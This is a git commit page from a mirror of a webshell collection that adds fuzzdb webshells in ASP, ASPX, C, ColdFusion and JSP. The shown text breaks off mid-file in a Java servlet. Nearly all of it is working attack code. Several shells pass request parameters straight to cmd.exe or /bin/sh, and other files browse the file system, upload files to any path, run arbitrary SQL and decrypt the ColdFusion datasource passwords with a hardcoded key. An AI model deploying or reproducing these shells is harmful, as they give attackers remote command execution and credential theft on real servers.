mirror of
https://github.com/tennc/webshell
synced 2024-11-24 20:23:04 +00:00
fzuudb-webshell
This commit is contained in:
parent
6a88226bfd
commit
f06456a918
42 changed files with 5982 additions and 0 deletions
41
fuzzdb-webshell/asp/cmd-asp-5.1.asp
Normal file
41
fuzzdb-webshell/asp/cmd-asp-5.1.asp
Normal file
|
@ -0,0 +1,41 @@
|
|||
<%
|
||||
|
||||
' ASP Cmd Shell On IIS 5.1
|
||||
' brett.moore_at_security-assessment.com
|
||||
' http://seclists.org/bugtraq/2006/Dec/0226.html
|
||||
|
||||
|
||||
Dim oS,oSNet,oFSys, oF,szCMD, szTF
|
||||
On Error Resume Next
|
||||
Set oS = Server.CreateObject("WSCRIPT.SHELL")
|
||||
Set oSNet = Server.CreateObject("WSCRIPT.NETWORK")
|
||||
Set oFSys = Server.CreateObject("Scripting.FileSystemObject")
|
||||
szCMD = Request.Form("C")
|
||||
If (szCMD <> "") Then
|
||||
szTF = "c:\windows\pchealth\ERRORREP\QHEADLES\" & oFSys.GetTempName()
|
||||
' Here we do the command
|
||||
Call oS.Run("win.com cmd.exe /c """ & szCMD & " > " & szTF &
|
||||
"""",0,True)
|
||||
response.write szTF
|
||||
' Change perms
|
||||
Call oS.Run("win.com cmd.exe /c cacls.exe " & szTF & " /E /G
|
||||
everyone:F",0,True)
|
||||
Set oF = oFSys.OpenTextFile(szTF,1,False,0)
|
||||
End If
|
||||
%>
|
||||
<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
|
||||
<input type=text name="C" size=70 value="<%= szCMD %>">
|
||||
<input type=submit value="Run"></FORM><PRE>
|
||||
Machine: <%=oSNet.ComputerName%><BR>
|
||||
Username: <%=oSNet.UserName%><br>
|
||||
<%
|
||||
If (IsObject(oF)) Then
|
||||
On Error Resume Next
|
||||
Response.Write Server.HTMLEncode(oF.ReadAll)
|
||||
oF.Close
|
||||
Call oS.Run("win.com cmd.exe /c del "& szTF,0,True)
|
||||
End If
|
||||
|
||||
%>
|
||||
|
||||
<!-- http://michaeldaw.org 2006 -->
|
47
fuzzdb-webshell/asp/cmd.asp
Normal file
47
fuzzdb-webshell/asp/cmd.asp
Normal file
|
@ -0,0 +1,47 @@
|
|||
<!--
|
||||
|
||||
ASP_KIT
|
||||
|
||||
cmd.asp = Command Execution
|
||||
|
||||
by: Maceo
|
||||
modified: 25/06/2003
|
||||
|
||||
-->
|
||||
|
||||
<%
|
||||
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
|
||||
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
|
||||
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
|
||||
|
||||
szCMD = request("cmd")
|
||||
|
||||
If (szCMD <> "") Then
|
||||
szTempFile = "C:\" & oFileSys.GetTempName( )
|
||||
Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
|
||||
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
|
||||
End If
|
||||
%>
|
||||
|
||||
<HTML>
|
||||
<BODY>
|
||||
<FORM action="" method="GET">
|
||||
<input type="text" name="cmd" size=45 value="<%= szCMD %>">
|
||||
<input type="submit" value="Run">
|
||||
</FORM>
|
||||
<PRE>
|
||||
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
|
||||
<br>
|
||||
<%
|
||||
If (IsObject(oFile)) Then
|
||||
On Error Resume Next
|
||||
Response.Write Server.HTMLEncode(oFile.ReadAll)
|
||||
oFile.Close
|
||||
Call oFileSys.DeleteFile(szTempFile, True)
|
||||
End If
|
||||
%>
|
||||
</BODY>
|
||||
</HTML>
|
||||
|
||||
|
||||
|
37
fuzzdb-webshell/asp/cmd.aspx
Normal file
37
fuzzdb-webshell/asp/cmd.aspx
Normal file
|
@ -0,0 +1,37 @@
|
|||
<%@ Page Language="VB" Debug="true" %>
|
||||
<%@ import Namespace="system.IO" %>
|
||||
<%@ import Namespace="System.Diagnostics" %>
|
||||
|
||||
<script runat="server">
|
||||
|
||||
Sub RunCmd(Src As Object, E As EventArgs)
|
||||
Dim myProcess As New Process()
|
||||
Dim myProcessStartInfo As New ProcessStartInfo(xpath.text)
|
||||
myProcessStartInfo.UseShellExecute = false
|
||||
myProcessStartInfo.RedirectStandardOutput = true
|
||||
myProcess.StartInfo = myProcessStartInfo
|
||||
myProcessStartInfo.Arguments=xcmd.text
|
||||
myProcess.Start()
|
||||
|
||||
Dim myStreamReader As StreamReader = myProcess.StandardOutput
|
||||
Dim myString As String = myStreamReader.Readtoend()
|
||||
myProcess.Close()
|
||||
mystring=replace(mystring,"<","<")
|
||||
mystring=replace(mystring,">",">")
|
||||
result.text= vbcrlf & "<pre>" & mystring & "</pre>"
|
||||
End Sub
|
||||
|
||||
</script>
|
||||
|
||||
<html>
|
||||
<body>
|
||||
<form runat="server">
|
||||
<p><asp:Label id="L_p" runat="server" width="80px">Program</asp:Label>
|
||||
<asp:TextBox id="xpath" runat="server" Width="300px">c:\windows\system32\cmd.exe</asp:TextBox>
|
||||
<p><asp:Label id="L_a" runat="server" width="80px">Arguments</asp:Label>
|
||||
<asp:TextBox id="xcmd" runat="server" Width="300px" Text="/c net user">/c net user</asp:TextBox>
|
||||
<p><asp:Button id="Button" onclick="runcmd" runat="server" Width="100px" Text="Run"></asp:Button>
|
||||
<p><asp:Label id="result" runat="server"></asp:Label>
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
55
fuzzdb-webshell/asp/cmdasp.asp
Normal file
55
fuzzdb-webshell/asp/cmdasp.asp
Normal file
|
@ -0,0 +1,55 @@
|
|||
<%@ Language=VBScript %>
|
||||
<%
|
||||
' --------------------o0o--------------------
|
||||
' File: CmdAsp.asp
|
||||
' Author: Maceo <maceo @ dogmile.com>
|
||||
' Release: 2000-12-01
|
||||
' OS: Windows 2000, 4.0 NT
|
||||
' -------------------------------------------
|
||||
|
||||
Dim oScript
|
||||
Dim oScriptNet
|
||||
Dim oFileSys, oFile
|
||||
Dim szCMD, szTempFile
|
||||
|
||||
On Error Resume Next
|
||||
|
||||
' -- create the COM objects that we will be using -- '
|
||||
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
|
||||
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
|
||||
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
|
||||
|
||||
' -- check for a command that we have posted -- '
|
||||
szCMD = Request.Form(".CMD")
|
||||
If (szCMD <> "") Then
|
||||
|
||||
' -- Use a poor man's pipe ... a temp file -- '
|
||||
szTempFile = "C:\" & oFileSys.GetTempName( )
|
||||
Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
|
||||
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
|
||||
|
||||
End If
|
||||
|
||||
%>
|
||||
<HTML>
|
||||
<BODY>
|
||||
<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
|
||||
<input type=text name=".CMD" size=45 value="<%= szCMD %>">
|
||||
<input type=submit value="Run">
|
||||
</FORM>
|
||||
<PRE>
|
||||
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
|
||||
<br>
|
||||
<%
|
||||
If (IsObject(oFile)) Then
|
||||
' -- Read the output from our command and remove the temp file -- '
|
||||
On Error Resume Next
|
||||
Response.Write Server.HTMLEncode(oFile.ReadAll)
|
||||
oFile.Close
|
||||
Call oFileSys.DeleteFile(szTempFile, True)
|
||||
End If
|
||||
%>
|
||||
</BODY>
|
||||
</HTML>
|
||||
|
||||
<!-- http://michaeldaw.org 2006 -->
|
42
fuzzdb-webshell/asp/cmdasp.aspx
Normal file
42
fuzzdb-webshell/asp/cmdasp.aspx
Normal file
|
@ -0,0 +1,42 @@
|
|||
<%@ Page Language="C#" Debug="true" Trace="false" %>
|
||||
<%@ Import Namespace="System.Diagnostics" %>
|
||||
<%@ Import Namespace="System.IO" %>
|
||||
<script Language="c#" runat="server">
|
||||
void Page_Load(object sender, EventArgs e)
|
||||
{
|
||||
}
|
||||
string ExcuteCmd(string arg)
|
||||
{
|
||||
ProcessStartInfo psi = new ProcessStartInfo();
|
||||
psi.FileName = "cmd.exe";
|
||||
psi.Arguments = "/c "+arg;
|
||||
psi.RedirectStandardOutput = true;
|
||||
psi.UseShellExecute = false;
|
||||
Process p = Process.Start(psi);
|
||||
StreamReader stmrdr = p.StandardOutput;
|
||||
string s = stmrdr.ReadToEnd();
|
||||
stmrdr.Close();
|
||||
return s;
|
||||
}
|
||||
void cmdExe_Click(object sender, System.EventArgs e)
|
||||
{
|
||||
Response.Write("<pre>");
|
||||
Response.Write(Server.HtmlEncode(ExcuteCmd(txtArg.Text)));
|
||||
Response.Write("</pre>");
|
||||
}
|
||||
</script>
|
||||
<HTML>
|
||||
<HEAD>
|
||||
<title>awen asp.net webshell</title>
|
||||
</HEAD>
|
||||
<body >
|
||||
<form id="cmd" method="post" runat="server">
|
||||
<asp:TextBox id="txtArg" style="Z-INDEX: 101; LEFT: 405px; POSITION: absolute; TOP: 20px" runat="server" Width="250px"></asp:TextBox>
|
||||
<asp:Button id="testing" style="Z-INDEX: 102; LEFT: 675px; POSITION: absolute; TOP: 18px" runat="server" Text="excute" OnClick="cmdExe_Click"></asp:Button>
|
||||
<asp:Label id="lblText" style="Z-INDEX: 103; LEFT: 310px; POSITION: absolute; TOP: 22px" runat="server">Command:</asp:Label>
|
||||
</form>
|
||||
</body>
|
||||
</HTML>
|
||||
|
||||
<!-- Contributed by Dominic Chell (http://digitalapocalypse.blogspot.com/) -->
|
||||
<!-- http://michaeldaw.org 04/2007 -->
|
79
fuzzdb-webshell/asp/list.asp
Normal file
79
fuzzdb-webshell/asp/list.asp
Normal file
|
@ -0,0 +1,79 @@
|
|||
<!--
|
||||
|
||||
ASP_KIT
|
||||
|
||||
list.asp = Directory & File View
|
||||
|
||||
by: darkraver
|
||||
modified: 16/12/2005
|
||||
|
||||
-->
|
||||
|
||||
<body>
|
||||
<html>
|
||||
|
||||
<%
|
||||
|
||||
file=request("file")
|
||||
tipo=request("type")
|
||||
|
||||
If file="" then
|
||||
file="c:\"
|
||||
tipo="1"
|
||||
End If
|
||||
|
||||
%>
|
||||
|
||||
|
||||
<FORM action="" method="GET">
|
||||
<INPUT TYPE="text" NAME="file" value="<%=file%>">
|
||||
<INPUT TYPE="hidden" NAME="type" value="<%=tipo%>">
|
||||
<INPUT TYPE="submit" Value="Consultar">
|
||||
</FORM>
|
||||
|
||||
|
||||
<%
|
||||
|
||||
If tipo="1" then
|
||||
Response.Write("<h3>PATH: " & file & "</h3>")
|
||||
ListFolder(file)
|
||||
End If
|
||||
|
||||
If tipo="2" then
|
||||
Response.Write("<h3>FILE: " & file & "</h3>")
|
||||
|
||||
Set oStr = server.CreateObject("Scripting.FileSystemObject")
|
||||
Set oFich = oStr.OpenTextFile(file, 1)
|
||||
|
||||
Response.Write("<pre>--<br>")
|
||||
|
||||
Response.Write(oFich.ReadAll)
|
||||
|
||||
Response.Write("<br>--</pre>")
|
||||
|
||||
End If
|
||||
%>
|
||||
|
||||
<%
|
||||
|
||||
sub ListFolder(path)
|
||||
|
||||
set fs = CreateObject("Scripting.FileSystemObject")
|
||||
set folder = fs.GetFolder(path)
|
||||
|
||||
Response.Write("<br>( ) <a href=?type=1&file=" & server.URLencode(path) & "..\>" & ".." & "</a>" & vbCrLf)
|
||||
|
||||
for each item in folder.SubFolders
|
||||
Response.Write("<br>( ) <a href=?type=1&file=" & server.URLencode(item.path) & "\>" & item.Name & "</a>" & vbCrLf)
|
||||
next
|
||||
|
||||
for each item in folder.Files
|
||||
Response.Write("<li><a href=?type=2&file=" & server.URLencode(item.path) & ">" & item.Name & "</a> - " & item.Size & " bytes, " & "</li>" & vbCrLf)
|
||||
next
|
||||
|
||||
end sub
|
||||
|
||||
%>
|
||||
|
||||
</body>
|
||||
</html>
|
79
fuzzdb-webshell/asp/list.txt
Normal file
79
fuzzdb-webshell/asp/list.txt
Normal file
|
@ -0,0 +1,79 @@
|
|||
<!--
|
||||
|
||||
ASP_KIT
|
||||
|
||||
list.asp = Directory & File View
|
||||
|
||||
by: darkraver
|
||||
modified: 16/12/2005
|
||||
|
||||
-->
|
||||
|
||||
<body>
|
||||
<html>
|
||||
|
||||
<%
|
||||
|
||||
file=request("file")
|
||||
tipo=request("type")
|
||||
|
||||
If file="" then
|
||||
file="c:\"
|
||||
tipo="1"
|
||||
End If
|
||||
|
||||
%>
|
||||
|
||||
|
||||
<FORM action="" method="GET">
|
||||
<INPUT TYPE="text" NAME="file" value="<%=file%>">
|
||||
<INPUT TYPE="hidden" NAME="type" value="<%=tipo%>">
|
||||
<INPUT TYPE="submit" Value="Consultar">
|
||||
</FORM>
|
||||
|
||||
|
||||
<%
|
||||
|
||||
If tipo="1" then
|
||||
Response.Write("<h3>PATH: " & file & "</h3>")
|
||||
ListFolder(file)
|
||||
End If
|
||||
|
||||
If tipo="2" then
|
||||
Response.Write("<h3>FILE: " & file & "</h3>")
|
||||
|
||||
Set oStr = server.CreateObject("Scripting.FileSystemObject")
|
||||
Set oFich = oStr.OpenTextFile(file, 1)
|
||||
|
||||
Response.Write("<pre>--<br>")
|
||||
|
||||
Response.Write(oFich.ReadAll)
|
||||
|
||||
Response.Write("<br>--</pre>")
|
||||
|
||||
End If
|
||||
%>
|
||||
|
||||
<%
|
||||
|
||||
sub ListFolder(path)
|
||||
|
||||
set fs = CreateObject("Scripting.FileSystemObject")
|
||||
set folder = fs.GetFolder(path)
|
||||
|
||||
Response.Write("<br>( ) <a href=?type=1&file=" & server.URLencode(path) & "..\>" & ".." & "</a>" & vbCrLf)
|
||||
|
||||
for each item in folder.SubFolders
|
||||
Response.Write("<br>( ) <a href=?type=1&file=" & server.URLencode(item.path) & "\>" & item.Name & "</a>" & vbCrLf)
|
||||
next
|
||||
|
||||
for each item in folder.Files
|
||||
Response.Write("<li><a href=?type=2&file=" & server.URLencode(item.path) & ">" & item.Name & "</a> - " & item.Size & " bytes, " & "</li>" & vbCrLf)
|
||||
next
|
||||
|
||||
end sub
|
||||
|
||||
%>
|
||||
|
||||
</body>
|
||||
</html>
|
1013
fuzzdb-webshell/asp/ntdaddy.asp
Normal file
1013
fuzzdb-webshell/asp/ntdaddy.asp
Normal file
File diff suppressed because it is too large
Load diff
137
fuzzdb-webshell/asp/up.asp
Normal file
137
fuzzdb-webshell/asp/up.asp
Normal file
|
@ -0,0 +1,137 @@
|
|||
<!--
|
||||
|
||||
ASP_KIT
|
||||
|
||||
up.asp = File upload
|
||||
|
||||
by: Unknown
|
||||
modified: 25/06/2003
|
||||
|
||||
-->
|
||||
|
||||
<%
|
||||
|
||||
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
|
||||
|
||||
%>
|
||||
|
||||
<%
|
||||
Response.Buffer = true
|
||||
Function BuildUpload(RequestBin)
|
||||
'Get the boundary
|
||||
PosBeg = 1
|
||||
PosEnd = InstrB(PosBeg,RequestBin,getByteString(chr(13)))
|
||||
boundary = MidB(RequestBin,PosBeg,PosEnd-PosBeg)
|
||||
boundaryPos = InstrB(1,RequestBin,boundary)
|
||||
'Get all data inside the boundaries
|
||||
Do until (boundaryPos=InstrB(RequestBin,boundary & getByteString("--")))
|
||||
'Members variable of objects are put in a dictionary object
|
||||
Dim UploadControl
|
||||
Set UploadControl = CreateObject("Scripting.Dictionary")
|
||||
'Get an object name
|
||||
Pos = InstrB(BoundaryPos,RequestBin,getByteString("Content-Disposition"))
|
||||
Pos = InstrB(Pos,RequestBin,getByteString("name="))
|
||||
PosBeg = Pos+6
|
||||
PosEnd = InstrB(PosBeg,RequestBin,getByteString(chr(34)))
|
||||
Name = getString(MidB(RequestBin,PosBeg,PosEnd-PosBeg))
|
||||
PosFile = InstrB(BoundaryPos,RequestBin,getByteString("filename="))
|
||||
PosBound = InstrB(PosEnd,RequestBin,boundary)
|
||||
'Test if object is of file type
|
||||
If PosFile<>0 AND (PosFile<PosBound) Then
|
||||
'Get Filename, content-type and content of file
|
||||
PosBeg = PosFile + 10
|
||||
PosEnd = InstrB(PosBeg,RequestBin,getByteString(chr(34)))
|
||||
FileName = getString(MidB(RequestBin,PosBeg,PosEnd-PosBeg))
|
||||
'Add filename to dictionary object
|
||||
UploadControl.Add "FileName", FileName
|
||||
Pos = InstrB(PosEnd,RequestBin,getByteString("Content-Type:"))
|
||||
PosBeg = Pos+14
|
||||
PosEnd = InstrB(PosBeg,RequestBin,getByteString(chr(13)))
|
||||
'Add content-type to dictionary object
|
||||
ContentType = getString(MidB(RequestBin,PosBeg,PosEnd-PosBeg))
|
||||
UploadControl.Add "ContentType",ContentType
|
||||
'Get content of object
|
||||
PosBeg = PosEnd+4
|
||||
PosEnd = InstrB(PosBeg,RequestBin,boundary)-2
|
||||
Value = MidB(RequestBin,PosBeg,PosEnd-PosBeg)
|
||||
Else
|
||||
'Get content of object
|
||||
Pos = InstrB(Pos,RequestBin,getByteString(chr(13)))
|
||||
PosBeg = Pos+4
|
||||
PosEnd = InstrB(PosBeg,RequestBin,boundary)-2
|
||||
Value = getString(MidB(RequestBin,PosBeg,PosEnd-PosBeg))
|
||||
End If
|
||||
UploadControl.Add "Value" , Value
|
||||
UploadRequest.Add name, UploadControl
|
||||
BoundaryPos=InstrB(BoundaryPos+LenB(boundary),RequestBin,boundary)
|
||||
Loop
|
||||
End Function
|
||||
%>
|
||||
|
||||
<%
|
||||
Function getByteString(StringStr)
|
||||
For i = 1 to Len(StringStr)
|
||||
char = Mid(StringStr,i,1)
|
||||
getByteString = getByteString & chrB(AscB(char))
|
||||
Next
|
||||
End Function
|
||||
%>
|
||||
|
||||
<%
|
||||
Function getString(StringBin)
|
||||
getString =""
|
||||
For intCount = 1 to LenB(StringBin)
|
||||
getString = getString & chr(AscB(MidB(StringBin,intCount,1)))
|
||||
Next
|
||||
End Function
|
||||
%>
|
||||
|
||||
<%
|
||||
If request("ok")="1" then
|
||||
Response.Clear
|
||||
byteCount = Request.TotalBytes
|
||||
|
||||
RequestBin = Request.BinaryRead(byteCount)
|
||||
|
||||
Set UploadRequest = CreateObject("Scripting.Dictionary")
|
||||
|
||||
BuildUpload(RequestBin)
|
||||
|
||||
If UploadRequest.Item("fichero").Item("Value") <> "" Then
|
||||
|
||||
contentType = UploadRequest.Item("fichero").Item("ContentType")
|
||||
filepathname = UploadRequest.Item("fichero").Item("FileName")
|
||||
filename = Right(filepathname,Len(filepathname)-InstrRev(filepathname,"\"))
|
||||
value = UploadRequest.Item("fichero").Item("Value")
|
||||
|
||||
path = UploadRequest.Item("path").Item("Value")
|
||||
|
||||
filename = path & filename
|
||||
|
||||
Set MyFileObject = Server.CreateObject("Scripting.FileSystemObject")
|
||||
Set objFile = MyFileObject.CreateTextFile(filename)
|
||||
|
||||
For i = 1 to LenB(value)
|
||||
objFile.Write chr(AscB(MidB(value,i,1)))
|
||||
Next
|
||||
objFile.Close
|
||||
Set objFile = Nothing
|
||||
Set MyFileObject = Nothing
|
||||
End If
|
||||
Set UploadRequest = Nothing
|
||||
End If
|
||||
%>
|
||||
|
||||
<HTML>
|
||||
<BODY>
|
||||
<FORM action="?ok=1" method="POST" ENCTYPE="multipart/form-data">
|
||||
<INPUT TYPE="file" NAME="fichero">
|
||||
<INPUT TYPE="submit" Value="Upload">
|
||||
<br>Target PATH:<br><INPUT TYPE="text" Name="path" Value="C:\">
|
||||
</FORM>
|
||||
<PRE>
|
||||
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
|
||||
<br>
|
||||
File: <%=filename%>
|
||||
</HTML>
|
||||
</BODY>
|
74
fuzzdb-webshell/c/cmd.c
Normal file
74
fuzzdb-webshell/c/cmd.c
Normal file
|
@ -0,0 +1,74 @@
|
|||
//
|
||||
// cmdcgi.exe 0.1 darkraver (12/05/2005)
|
||||
//
|
||||
|
||||
#include <stdio.h>
|
||||
|
||||
|
||||
char *uri_decode(char *uri) {
|
||||
int i=0;
|
||||
int ptr=0;
|
||||
char *command;
|
||||
char hexa[3];
|
||||
char code;
|
||||
|
||||
command=(char *)malloc(strlen(uri));
|
||||
|
||||
for(i=0;i<strlen(uri);i++) {
|
||||
|
||||
switch(*(uri+i)) {
|
||||
case '+':
|
||||
*(command+ptr)=' ';
|
||||
ptr++;
|
||||
break;
|
||||
case '%':
|
||||
sprintf(hexa, "%c%c\x00", *(uri+i+1), *(uri+i+2));
|
||||
i+=2;
|
||||
//printf("HEXA: %s\n", hexa);
|
||||
sscanf(hexa, "%x", &code);
|
||||
//printf("CODE: %c\n", code);
|
||||
*(command+ptr)=code;
|
||||
ptr++;
|
||||
break;
|
||||
default:
|
||||
*(command+ptr)=*(uri+i);
|
||||
ptr++;
|
||||
break;
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
*(command+ptr)='\0';
|
||||
|
||||
return command;
|
||||
|
||||
}
|
||||
|
||||
|
||||
int main(int argc, char **argv) {
|
||||
char *cmd;
|
||||
|
||||
printf("Content-type: text/html\n\n");
|
||||
printf("<html><body>\n");
|
||||
|
||||
cmd=(char *)getenv("QUERY_STRING");
|
||||
|
||||
if(!cmd || strlen(cmd)==0) {
|
||||
printf("<hr><p><form method=\"GET\" name=\"myform\" action=\"\">");
|
||||
printf("<input type=\"text\" name=\"cmd\">");
|
||||
printf("<input type=\"submit\" value=\"Send\">");
|
||||
printf("<br><br><hr></form>");
|
||||
} else {
|
||||
//printf("QUERY_STRING: %s\n", cmd);
|
||||
cmd+=4;
|
||||
cmd=uri_decode(cmd);
|
||||
printf("<hr><p><b>COMMAND: %s</b><br><br><hr><pre>\n", cmd);
|
||||
fflush(stdout);
|
||||
execl("/bin/sh", "/bin/sh", "-c", cmd, 0);
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
|
||||
|
||||
|
77
fuzzdb-webshell/cfm/cfExec.cfm
Normal file
77
fuzzdb-webshell/cfm/cfExec.cfm
Normal file
|
@ -0,0 +1,77 @@
|
|||
<html>
|
||||
<body>
|
||||
|
||||
<!-- orig author: kGrutzmacher -->
|
||||
<!-- additshonz: lawKnee -->
|
||||
<b>Notes:</b><br>
|
||||
<ul>
|
||||
<li>For Windows put this as command "c:\windows\system32\cmd.exe /c" or wherever cmd.exe is<br>
|
||||
<li>For Windows options are the command you want to run "dir" "type" etc
|
||||
</ul>
|
||||
<p>
|
||||
|
||||
<cfoutput>
|
||||
<table>
|
||||
<form method="POST" action="">
|
||||
<tr><td>Command:</td><td><input type=text name="cmd" size=50
|
||||
<cfif isdefined("form.cmd")>value="#form.cmd#"</cfif>><br></td></tr>
|
||||
<tr><td>Options:</td><td> <input type=text name="opts" size=50
|
||||
<cfif isdefined("form.opts")>value="#form.opts#"</cfif>><br></td></tr>
|
||||
<tr><td>Timeout:</td><td> <input type=text name="timeout" size=4
|
||||
<cfif isdefined("form.timeout")>value="#form.timeout#"
|
||||
<cfelse>value="5"</cfif>></td></tr>
|
||||
</table>
|
||||
<input type=submit value="Exec" >
|
||||
</form>
|
||||
|
||||
<cfif isdefined("form.cmd")>
|
||||
<cfsavecontent variable="myVar">
|
||||
<cfexecute name = "#Form.cmd#"
|
||||
arguments = "#Form.opts#"
|
||||
timeout = "#Form.timeout#">
|
||||
</cfexecute>
|
||||
</cfsavecontent>
|
||||
<pre>
|
||||
#HTMLCodeFormat(myVar)#
|
||||
</pre>
|
||||
</cfif>
|
||||
|
||||
<cfscript>
|
||||
//The following code borrowed from hernanOchoa @hexale (thx)
|
||||
//added better formatting on output and connection string [lb]
|
||||
|
||||
// Create Data Source Object
|
||||
dataSourceObb=createobject("java","coldfusion.server.ServiceFactory").
|
||||
getDatasourceService().getDatasources();
|
||||
writeoutput("<br><br><b>Datasource Credentials:</b><br>");
|
||||
writeoutput("<table>");
|
||||
// Loop Through DataSources
|
||||
for(i in dataSourceObb) {
|
||||
if(len(dataSourceObb[i]["password"])){
|
||||
|
||||
// Get url
|
||||
theurl=(dataSourceObb[i]["url"]);
|
||||
|
||||
// Get username
|
||||
username=(dataSourceObb[i]["username"]);
|
||||
|
||||
// Get and decrypt password
|
||||
decryptPassword=Decrypt(dataSourceObb[i]["password"],
|
||||
generate3DesKey("0yJ!@1$r8p0L@r1$6yJ!@1rj"), "DESede",
|
||||
"Base64");
|
||||
|
||||
// Output datasource usernames, passwords, and urls
|
||||
writeoutput("" &
|
||||
"<tr><td>DataSource: " & i & "</td>" &
|
||||
"<td>Username: " & username & "</td>" &
|
||||
"<td>Password: " & decryptPassword &
|
||||
"<td>URL: " & theurl & "</td></tr>");
|
||||
}
|
||||
}
|
||||
writeoutput("</table><br>");
|
||||
</cfscript>
|
||||
</cfoutput>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
<!-- orig from mDaw bdoor -->
|
64
fuzzdb-webshell/cfm/cfSQL.cfm
Normal file
64
fuzzdb-webshell/cfm/cfSQL.cfm
Normal file
|
@ -0,0 +1,64 @@
|
|||
<!-- foldFusion page by lawKnee -->
|
||||
<!-- useful when you can upload cfm and would like to talk to all db's avail -->
|
||||
<!-- but dont want to (or can't) connect from the OS -->
|
||||
<!-- this page uses ServiceFactory to auto-enum all datasources on the instance -->
|
||||
<!-- only works on CF8 and below, but unpatched CF9 should work too -->
|
||||
|
||||
<html>
|
||||
<body>
|
||||
<p><b>Notes:</b></p>
|
||||
<ul>
|
||||
<li>Select the database you want to use</li>
|
||||
<li>Write SQL statements in the text box</li>
|
||||
</ul>
|
||||
|
||||
<form method="POST" action="">
|
||||
<p><b>SQL Interface:</b></p>
|
||||
Datasource<br>
|
||||
<select name="datasource">
|
||||
<cfscript>
|
||||
dataSourceObb=createobject("java","coldfusion.server.ServiceFactory").
|
||||
getDatasourceService().getDatasources();
|
||||
for(i in dataSourceObb) {
|
||||
writeoutput('<option value="' & i & '">' & i & '</option>');
|
||||
}
|
||||
</cfscript>
|
||||
</select>
|
||||
|
||||
<br>
|
||||
SQL<br>
|
||||
<textarea name="sql" rows="5" cols="100"></textarea>
|
||||
<br>
|
||||
<input type=submit value="Exec">
|
||||
</form>
|
||||
|
||||
<cfif isdefined("form.sql")>
|
||||
<cfquery name="runsql" datasource="#Form.datasource#" timeout="30">
|
||||
#Form.sql#
|
||||
</cfquery>
|
||||
</cfif>
|
||||
|
||||
<table border=1>
|
||||
<cfif isdefined("form.sql")>
|
||||
<cfloop from="0" to="#runsql.RecordCount#" index="row">
|
||||
<cfif row eq 0>
|
||||
<tr>
|
||||
<cfloop list="#runsql.ColumnList#" index="column" delimiters=",">
|
||||
<th><cfoutput>#column#</cfoutput></th>
|
||||
</cfloop>
|
||||
</tr>
|
||||
<cfelse>
|
||||
<tr>
|
||||
<cfloop list="#runsql.ColumnList#" index="column" delimiters=",">
|
||||
<td><cfoutput>#runsql[column][row]#</cfoutput></td>
|
||||
</cfloop>
|
||||
</tr>
|
||||
</cfif>
|
||||
</cfloop>
|
||||
</cfif>
|
||||
</table>
|
||||
|
||||
|
||||
|
||||
</body>
|
||||
</html>
|
32
fuzzdb-webshell/cfm/cmd.cfm
Normal file
32
fuzzdb-webshell/cfm/cmd.cfm
Normal file
|
@ -0,0 +1,32 @@
|
|||
<html>
|
||||
<body>
|
||||
|
||||
<cfoutput>
|
||||
<table>
|
||||
<form method="POST" action="">
|
||||
<tr>
|
||||
<td>Command:</td>
|
||||
<td> < input type=text name="cmd" size=50<cfif isdefined("form.cmd")> value="#form.cmd#" </cfif>> < br></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>Options:</td>
|
||||
<td> < input type=text name="opts" size=50 <cfif isdefined("form.opts")> value="#form.opts#" </cfif> >< br> </td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td>Timeout:</td>
|
||||
<td>< input type=text name="timeout" size=4 <cfif isdefined("form.timeout")> value="#form.timeout#" <cfelse> value="5" </cfif> > </td>
|
||||
</tr>
|
||||
</table>
|
||||
<input type=submit value="Exec" >
|
||||
</FORM>
|
||||
|
||||
<cfsavecontent variable="myVar">
|
||||
<cfexecute name = "#Form.cmd#" arguments = "#Form.opts#" timeout = "#Form.timeout#">
|
||||
</cfexecute>
|
||||
</cfsavecontent>
|
||||
<pre>
|
||||
#myVar#
|
||||
</pre>
|
||||
</cfoutput>
|
||||
</body>
|
||||
</html>
|
BIN
fuzzdb-webshell/jsp/CmdServlet.class
Normal file
BIN
fuzzdb-webshell/jsp/CmdServlet.class
Normal file
Binary file not shown.
43
fuzzdb-webshell/jsp/CmdServlet.java
Normal file
43
fuzzdb-webshell/jsp/CmdServlet.java
Normal file
|
@ -0,0 +1,43 @@
|
|||
/*
|
||||
* CmdServlet.java 20/01/2004
|
||||
*
|
||||
* @author The Dark Raver
|
||||
* @version 0.1
|
||||
*/
|
||||
|
||||
import java.io.*;
|
||||
import javax.servlet.*;
|
||||
import javax.servlet.http.*;
|
||||
|
||||
|
||||
public class CmdServlet extends HttpServlet {
|
||||
|
||||
public void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException {
|
||||
res.setContentType("text/html");
|
||||
|
||||
PrintWriter out = res.getWriter();
|
||||
out.print("<html><body>");
|
||||
out.print("<hr><p><form method=\"GET\" name=\"myform\" action=\"\">");
|
||||
out.print("<input type=\"text\" name=\"cmd\">");
|
||||
out.print("<input type=\"submit\" value=\"Send\">");
|
||||
out.print("</form>");
|
||||
|
||||
if(req.getParameter("cmd") != null) {
|
||||
out.print("\n<hr><p><b>Command: " + req.getParameter("cmd") + "\n</b><br><br><hr><pre>\n");
|
||||
Process p = Runtime.getRuntime().exec("cmd /c " + req.getParameter("cmd"));
|
||||
DataInputStream procIn = new DataInputStream(p.getInputStream());
|
||||
int c='\0';
|
||||
while ((c=procIn.read()) != -1) {
|
||||
out.print((char)c);
|
||||
